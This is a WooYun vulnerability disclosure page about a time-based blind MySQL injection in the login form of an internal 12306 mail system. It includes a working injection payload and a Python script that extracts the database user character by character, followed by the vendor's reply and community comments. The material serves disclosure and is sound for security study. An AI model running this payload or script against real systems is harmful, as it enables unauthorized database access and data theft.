当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089304

漏洞标题:12306某内部系统MySQL盲注需进一步修复(附验证脚本第四次绕过)

相关厂商:12306

漏洞作者: lijiejie

提交时间:2014-12-30 13:55

修复时间:2015-02-13 13:56

公开时间:2015-02-13 13:56

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-30: 细节已通知厂商并且等待厂商处理中
2015-01-01: 厂商已经确认,细节仅向厂商公开
2015-01-11: 细节向核心白帽子及相关领域专家公开
2015-01-21: 细节向普通白帽子公开
2015-01-31: 细节向实习白帽子公开
2015-02-13: 细节向公众公开

简要描述:

12306某内部系统MySQL盲注需进一步修复(附验证脚本,第四次绕过)
已存在多年,一直未修复完全,影响内部运营数据

详细说明:

注射点:

POST http://mail.12306.cn/app/mail/login
domain=aa'XOR(if(length(database())=4,sleep(1),0))OR'bb&id=1&lang=zh_cn&pwd=1&remember=on&sid=d947be26445ad5a2c49b16f97a22be55&style=classic


参数domain可注入,MySQL time blind. sid每次需要重新获取。

漏洞证明:

猜解user(),得到:

mail@localhost


12306.mail.mysql.blind.png


当前库:

mail


验证脚本: 

#encoding=gbk
import urllib2
import re
import httplib
import time
import string
import sys
import random
import urllib
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
html_doc = urllib2.urlopen('http://mail.12306.cn/app/mail/entry').read()
sid = re.search('name=sid value="([^"]+)"', html_doc).group(1)
print 'start to retrive MySQL user:'
user = ''
for i in range(1,15):
    count = 0
    for payload in payloads:
        try:
            conn = httplib.HTTPConnection('mail.12306.cn', timeout=60)
            s = "123'XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(5),0))OR'bbb" % (i, ord(payload) )
            params = {
                'id': '1',
                'lang': 'zh_cn',
                'pwd': 'test',
                'remember': 'on',
                'sid': sid,
                'style': 'classic',
                'domain': s
            }
            conn.request(method='POST',
                         url='/app/mail/login',
                         body = urllib.urlencode(params),
                         headers = headers)
            start_time = time.time()
            html_doc = conn.getresponse().read()
            conn.close()
            if time.time() - start_time > 5:
                raise Exception('oooooooops')
            count += 1
            sys.stdout.write('\r'+ '.' * count)
            sys.stdout.flush()
        except:
            user += payload
            print '\r[In progress]', user
            break
print '\n[Done]MySQL user is', user

修复方案:

建议还是过滤一下

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-01-01 10:13

厂商回复:

正在检查

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-30 11:20 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    这哪里只是影响用户信息,企业内部信息可能也在劫难逃啊

  2. 2014-12-30 11:22 | kydhzy ( 普通白帽子 | Rank:362 漏洞数:62 | 软件测试)

    前排

  3. 2014-12-30 11:25 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:19 | 么么哒,呵呵哒,么蛤蛤~)

    CCTV看这里!

  4. 2014-12-30 11:25 | bitcoin ( 普通白帽子 | Rank:715 漏洞数:218 | 学习是最好的投资!)

    @lijiejie 围观大牛!

  5. 2014-12-30 11:27 | 杀器王子 认证白帽子 ( 普通白帽子 | Rank:1532 漏洞数:121 | 磨刀霍霍向猪羊)

    注入狂魔李姐姐

  6. 2014-12-30 11:28 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    我在等李姐姐把杀妻王子干掉

  7. 2014-12-30 11:30 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    12306是要火的节奏么。

  8. 2014-12-30 11:37 | 冰冻冷咖啡 ( 路人 | Rank:5 漏洞数:2 | 菜鸟一只)

    你们这是一起刷12丧零六啊

  9. 2014-12-30 11:40 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    第四次。。。所以说12306在某全球最大的平台去发奖励根本不解决问题么

  10. 2014-12-30 11:46 | lijiejie 认证白帽子 ( 核心白帽子 | Rank:2210 漏洞数:294 | Just for fun.)

    @px1624 这个第四次的标题应该是审核的同学加的… 不过漏洞确实存在已久

  11. 2014-12-30 11:48 | h4ckhell00 ( 路人 | Rank:10 漏洞数:2 | 最温暖的两个字是什么?1、我在。2、别怕。...)

    12306 这是年底要爆发的节奏吧。。

  12. 2014-12-30 11:50 | lijiejie 认证白帽子 ( 核心白帽子 | Rank:2210 漏洞数:294 | Just for fun.)

    @杀器王子 杀器王子全能王… 德艺双馨玩转各种内网渗透技术…

  13. 2014-12-30 11:50 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    同一个位置第四次绕过。。

  14. 2014-12-30 11:53 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    第四次,你们这是看不起这个几亿的网站么?

  15. 2014-12-30 13:19 | 窝窝哥 ( 实习白帽子 | Rank:86 漏洞数:29 | 没WB啊啊啊啊!)

    继续打脸!12306竟然去360那边!

  16. 2014-12-30 13:32 | Qiudays ( 路人 | Rank:10 漏洞数:9 | 感觉自己萌萌哒)

    12306的开发不甘寂寞啊....

  17. 2014-12-30 13:50 | 机器猫 ( 普通白帽子 | Rank:1141 漏洞数:253 | 爱生活、爱腾讯、爱网络!)

    CCTV拍这里!

  18. 2014-12-30 14:29 | YY-2012 ( 普通白帽子 | Rank:2763 漏洞数:641 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    CCTV拍拍拍拍拍拍拍拍拍拍拍拍拍拍拍拍拍

  19. 2014-12-30 15:01 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    吊炸天

  20. 2014-12-30 15:22 | 爱Gail ( 普通白帽子 | Rank:237 漏洞数:38 | 爱漏洞、爱编程、爱旅游、爱Gail)

    有意思,谁还说是撞库

  21. 2014-12-30 15:46 | ConTrol ( 普通白帽子 | Rank:135 漏洞数:43 | 【HD】以团队之名 以个人之荣耀 共建网...)

    打脸啪啪啪

  22. 2014-12-30 15:57 | 承诺 ( 路人 | Rank:17 漏洞数:2 | 你关注的漏洞 发表了白帽子)

    CCTV拍这里!.....papapa

  23. 2014-12-30 16:21 | 打酱油的小男孩 ( 路人 | Rank:0 漏洞数:1 | 俺也来乌云看看)

    啪啪啪啪啪啪啪。啪啪啪啪啪啪啪。啪啪啪啪啪啪啪。啪啪啪啪啪啪啪。啪啪啪啪啪啪啪。

  24. 2014-12-30 16:25 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    你好,请开下门,我们查下水表

  25. 2014-12-30 16:44 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    打脸女娲么?

  26. 2014-12-30 16:44 | 忽然之间 ( 普通白帽子 | Rank:802 漏洞数:131 | 空白格)

    你好,回家的票能给我整一张不?

  27. 2014-12-30 17:29 | bingfeng ( 路人 | Rank:10 漏洞数:3 | 万丈红尘三杯酒,千秋大业一壶茶。)

    看不了的飘过~

  28. 2014-12-30 19:39 | Taro ( 普通白帽子 | Rank:178 漏洞数:48 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    我只想换一张回家的车票啊

  29. 2014-12-30 21:35 | 红客十年 ( 普通白帽子 | Rank:334 漏洞数:63 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    @小威 威锅女娲是啥……话说我只想求一张回家的票。你们老撸铁道部干嘛

  30. 2014-12-30 21:37 | Angelic47 ( 路人 | Rank:1 漏洞数:1 )

    妈妈我要上电视啦~CCTV拍这里~~

  31. 2014-12-30 21:48 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    有意思,谁还说是撞库、打脸的节奏, CCTV看这里,哎呦喂镜头往这里凑凑,对就是这样,哎哎哎哎 哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎摄像师你别动镜头呀

  32. 2014-12-31 09:23 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    @红客十年 女娲能补天啊!真为你智商捉急

  33. 2014-12-31 11:23 | 红客十年 ( 普通白帽子 | Rank:334 漏洞数:63 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    @小威 我知道女娲能补天,我想知到女娲跟铁道部有啥关系。。。还是是哪位大神

  34. 2014-12-31 17:42 | 帅气小狼狗 ( 路人 | Rank:8 漏洞数:2 | 汪汪汪)

    使劲的打,让你不给我火车票。

  35. 2015-01-01 11:32 | huoji ( 实习白帽子 | Rank:41 漏洞数:9 | 目标是当个农民)

    打脸赞!

  36. 2015-01-01 12:40 | Observer ( 实习白帽子 | Rank:35 漏洞数:8 | 我在夕阳下奔跑,那是我逝去的青春)

    可以买一条两千块的项链了

  37. 2015-01-01 13:54 | 斯杰 ( 路人 | Rank:10 漏洞数:5 | By:S丶jer)

    我要上电视,ccav拍这里

  38. 2015-01-01 15:15 | SuperRookie ( 实习白帽子 | Rank:39 漏洞数:7 | 求收编,本人会注入,会上传,会Xss,会破...)

    我代表12306在说一次 这是撞库啊 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

  39. 2015-01-01 17:49 | xbuther ( 路人 | Rank:4 漏洞数:3 | 多多交流,一起进步。。。O(∩_∩)O~)

    这里。。这里。。。

  40. 2015-01-02 11:23 | J′aron ( 路人 | Rank:17 漏洞数:5 | 问题真实存在但是影响不大.)

    CCTV 看这里!啪啪啪啪啪啪啪

  41. 2015-01-21 16:47 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    那么给力!

  42. 2015-02-13 16:36 | pw0 ( 路人 | Rank:7 漏洞数:2 | 爱推理,爱计算机,爱社工,爱挖有(wei)...)

    妈妈我要上电视啦!